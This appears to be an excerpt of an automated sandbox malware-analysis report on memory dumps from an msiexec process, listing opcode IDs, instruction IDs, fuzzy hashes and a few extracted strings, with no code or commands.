                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1cfb5c5b75e27992a8d8b05bd5631db8a1fe5bd06eb804605ef79f9b4be010d0
                                                                              • Instruction ID: a304e35fe4014cfb433cd94416c2feb908e789b84d2980c0f7dd73f16a1af60b
                                                                              • Opcode Fuzzy Hash: 1cfb5c5b75e27992a8d8b05bd5631db8a1fe5bd06eb804605ef79f9b4be010d0
                                                                              • Instruction Fuzzy Hash: DFF1D731944AAA8BD7124F7485643DABBF1FF8F300F2885E9C8895B206DF355896CB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bb6c6efb5f22c12d54f5cb461131ed46382736403c7c8e8a8b725fc969bc2506
                                                                              • Instruction ID: 11d1ee38f9d2b0db5af01e90f852aecc9050ebf7cd81d52fe69f4acd8495e2b2
                                                                              • Opcode Fuzzy Hash: bb6c6efb5f22c12d54f5cb461131ed46382736403c7c8e8a8b725fc969bc2506
                                                                              • Instruction Fuzzy Hash: 0FA1C274E102198FDB14DFAAD884B9DBBF2BF89300F24806AE559AB361DB349D41CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75e64b2b0be2cac7e9a1aad151ce8537a099b56eb143f04cdd8dfb620b60ad82
                                                                              • Instruction ID: 23ef68f7d6c4618816e08a38dd90361f18004b0bb92b9e4c1429f5551658cb16
                                                                              • Opcode Fuzzy Hash: 75e64b2b0be2cac7e9a1aad151ce8537a099b56eb143f04cdd8dfb620b60ad82
                                                                              • Instruction Fuzzy Hash: CF91AF74E002188FDB14DFA9D884B9DBBB2BF89300F648069E819BB365DB74AD45CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a285e6b10452e25ece6512785f692bd96468a0dbd11eda8f8557a24dc3852ba2
                                                                              • Instruction ID: 917e227caf8310f0202c53572b9bb704c900eede82dfae7a85c7a54a41e7dfe8
                                                                              • Opcode Fuzzy Hash: a285e6b10452e25ece6512785f692bd96468a0dbd11eda8f8557a24dc3852ba2
                                                                              • Instruction Fuzzy Hash: A881A174E102588FEB54DFA9D984B9DBBF2BF88300F24806AD919AB361DB349D41CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1ebe94d6d75ecc3a5c7bcd75f5b847dc2270d34e71234b54ce6c6b050cce2b73
                                                                              • Instruction ID: 5718de8dd5b9ba49ac7c566dfedb887aabda826ac7c9f149e1367ec7056497b1
                                                                              • Opcode Fuzzy Hash: 1ebe94d6d75ecc3a5c7bcd75f5b847dc2270d34e71234b54ce6c6b050cce2b73
                                                                              • Instruction Fuzzy Hash: 24819174E102188FDB54DFAAD984A9DBBB2BF88300F24C06AD519AB365DB349D41CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fa8fb952366da05815684e0fca6dcbdf87f9b77d99c215fa93cebe13fbd23a2
                                                                              • Instruction ID: 53fc0a54d98842a6655e85891707981e741fb700ff4b5bedc13d082f41f7ae95
                                                                              • Opcode Fuzzy Hash: 5fa8fb952366da05815684e0fca6dcbdf87f9b77d99c215fa93cebe13fbd23a2
                                                                              • Instruction Fuzzy Hash: 5C818374E00218CFDB58DFA9D984A9DBBF2BF89300F24C069D459AB365DB349941CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7e96f9c103e8e8dd26341825cca169bd14ca8002ee5d671c2590cdfd46ab37c
                                                                              • Instruction ID: d866a5349b93c9419fb3b689d5ee0f44c2e6fd5fc5a05d279498bc9a84f446fd
                                                                              • Opcode Fuzzy Hash: a7e96f9c103e8e8dd26341825cca169bd14ca8002ee5d671c2590cdfd46ab37c
                                                                              • Instruction Fuzzy Hash: 63819274E002189FDB58DFA9D984B9DBBB2BF88300F24C06AD959AB361DB349D41CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 42ac472a2ccad9df03601cecff71df021eb9ae9d6e1e90bcd6963497736bf4ac
                                                                              • Instruction ID: 105c5ef441b95a6692763a16352b6a82c9234916ae502a0c59e2a06c7d579428
                                                                              • Opcode Fuzzy Hash: 42ac472a2ccad9df03601cecff71df021eb9ae9d6e1e90bcd6963497736bf4ac
                                                                              • Instruction Fuzzy Hash: F58192B4E002189FDB54DFA9D984A9DBBF2BF89300F24C06AD519AB361DB349D41CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 838bb3e558e7229f5a80c6272da89643ca86e98c646203b79c2247fbccd9c32c
                                                                              • Instruction ID: d3ae094a2b6e0d1c8b465b230123477422e3dd8f2a86e0b5d44af320d1ffc320
                                                                              • Opcode Fuzzy Hash: 838bb3e558e7229f5a80c6272da89643ca86e98c646203b79c2247fbccd9c32c
                                                                              • Instruction Fuzzy Hash: 72818174E002188FEB54DFAAD984A9DBBF2BF89310F24C069E419AB365DB349941CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c20c4cdb119b1bf06f951275918164ddc282f7dc64d8d6abdaffc55d9bc9870
                                                                              • Instruction ID: 8ac586f6024287c8c0b1daf1d5fbac46664f27ef1ac8486f61422043b97d1ea1
                                                                              • Opcode Fuzzy Hash: 8c20c4cdb119b1bf06f951275918164ddc282f7dc64d8d6abdaffc55d9bc9870
                                                                              • Instruction Fuzzy Hash: 465195B4E00309DFDB18DFA6D594A9DBBB2BF89300F24C129E815AB364DB359845CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 98c24a0777901ee0d6755f579964bfa6152e7d3625ee69ebd7b94569c44c10f5
                                                                              • Instruction ID: 55420cf4a8de2664ba411302386f3c235aff04327bfe0cc3dd02fae9fff5f27e
                                                                              • Opcode Fuzzy Hash: 98c24a0777901ee0d6755f579964bfa6152e7d3625ee69ebd7b94569c44c10f5
                                                                              • Instruction Fuzzy Hash: 215196B4E00209DFDB18DFA6D594A9DBBB2FF89300F24C02AE815AB365DB359845CF54
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$x0.%
                                                                              • API String ID: 0-792643775
                                                                              • Opcode ID: fbd94d326c0c5cd924bb7fe22b6a103ab8cc4c6eb1f1b242581b86e29045f017
                                                                              • Instruction ID: 6d57eeb2fe766512f35cca7336be9d6a77d9aa8872e1d87725891244493d1e24
                                                                              • Opcode Fuzzy Hash: fbd94d326c0c5cd924bb7fe22b6a103ab8cc4c6eb1f1b242581b86e29045f017
                                                                              • Instruction Fuzzy Hash: 0652D3B4A10219CFCB55DF64DD94B8DB7B2FB88301F5086A9E50AA7350DB786E81CF90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$\v%$x0.%
                                                                              • API String ID: 0-792643775
                                                                              • Opcode ID: eca3a9200158b4dacf4c9d31208e232c499ed859d7156133c45f9ea59d4c4e30
                                                                              • Instruction ID: 45b99da78033fef8b094c31f4f7d668a1a8f675758fa5b1a12e3bccd4fbd0bf3
                                                                              • Opcode Fuzzy Hash: eca3a9200158b4dacf4c9d31208e232c499ed859d7156133c45f9ea59d4c4e30
                                                                              • Instruction Fuzzy Hash: 4152D3B4A10219CFCB55DF64DD94B8DB7B2FB88301F5086A9E50AA7350DB786E81CF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fa5a350cedc1f841d6f34ee8720c027bc672ffb181ef52dee37320451feb23bf
                                                                              • Instruction ID: 719dee0299494ea0ea962032a56ed129f7c5bcf5a628be4c96d6d2a940bdf8b6
                                                                              • Opcode Fuzzy Hash: fa5a350cedc1f841d6f34ee8720c027bc672ffb181ef52dee37320451feb23bf
                                                                              • Instruction Fuzzy Hash: 7112A93A071B438FE2516F30DABC96A7B62FB5F363744AD10F28F855459F78184ACA21
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de2a183677f8d17dfe697c5264fcf4adad12517bc75115d27a7cf1d5c761a35b
                                                                              • Instruction ID: ada8bddb346a12d3f56653d5c3d2db9f2bf67ac9aa45e2806ab80db43f196b5d
                                                                              • Opcode Fuzzy Hash: de2a183677f8d17dfe697c5264fcf4adad12517bc75115d27a7cf1d5c761a35b
                                                                              • Instruction Fuzzy Hash: F312A93A071A438FE6512F30DABC96A7B66FB5F363344AD10F28F855459F781C4ACA21
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1e2010cc9a75a62a6a0d3f800247558bcf2e6ef9aa2ce7542baa64298388c864
                                                                              • Instruction ID: 9a77f218b72dce995f854a4f70f340f392f6882966902e8f1c81d39010046786
                                                                              • Opcode Fuzzy Hash: 1e2010cc9a75a62a6a0d3f800247558bcf2e6ef9aa2ce7542baa64298388c864
                                                                              • Instruction Fuzzy Hash: B991DB307042169FDB169F64C894B6E7BA7EBC8200F28856DE9469B395CF38DC42DB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 08ef176f04b87e781d9559c652347d4a931836ff708427311d6058f9837e6a20
                                                                              • Instruction ID: 5c9cb182843a3d78beabe103d9eb477d6c51346760a5a93beba06527dacecbc6
                                                                              • Opcode Fuzzy Hash: 08ef176f04b87e781d9559c652347d4a931836ff708427311d6058f9837e6a20
                                                                              • Instruction Fuzzy Hash: 9D817930A405069FCB14EF69C884A69BBFABFC9604B3481ADD506E7365DB31EC41CBE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0d05b5cb6b9931e915ea90c986177f1abdc1b73e49b42ba9849d153776b486f3
                                                                              • Instruction ID: ae7b6da18332083ba1447b445091d035d1d401b91f73b0a64013ba3176187a29
                                                                              • Opcode Fuzzy Hash: 0d05b5cb6b9931e915ea90c986177f1abdc1b73e49b42ba9849d153776b486f3
                                                                              • Instruction Fuzzy Hash: 0C61F074D01318DFDB14DFA5C854BAEBBB2BF89300F60812AD809AB391DB795986CF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe40e463e79dce38a4776c6b9f9f4fe54cae345fbbefa8bc6df1a443371c083b
                                                                              • Instruction ID: 22e0db2bd0808a52eb08df783967264717ce7446cf34de6a185707201196c7d7
                                                                              • Opcode Fuzzy Hash: fe40e463e79dce38a4776c6b9f9f4fe54cae345fbbefa8bc6df1a443371c083b
                                                                              • Instruction Fuzzy Hash: A3519374E01208DFDB44DFAAD98499DBBF2FF89300F248169E819AB365DB31A901CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599336399.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2dc0000_msiexec.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2599080230.0000000002D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2d9d000_msiexec.jbxd
                                                                              • Instruction Fuzzy Hash: 4351ED70E0520ACFDB14DFA8D484BEDBBB2BB89304F20912AD145AB794C7399C81CF64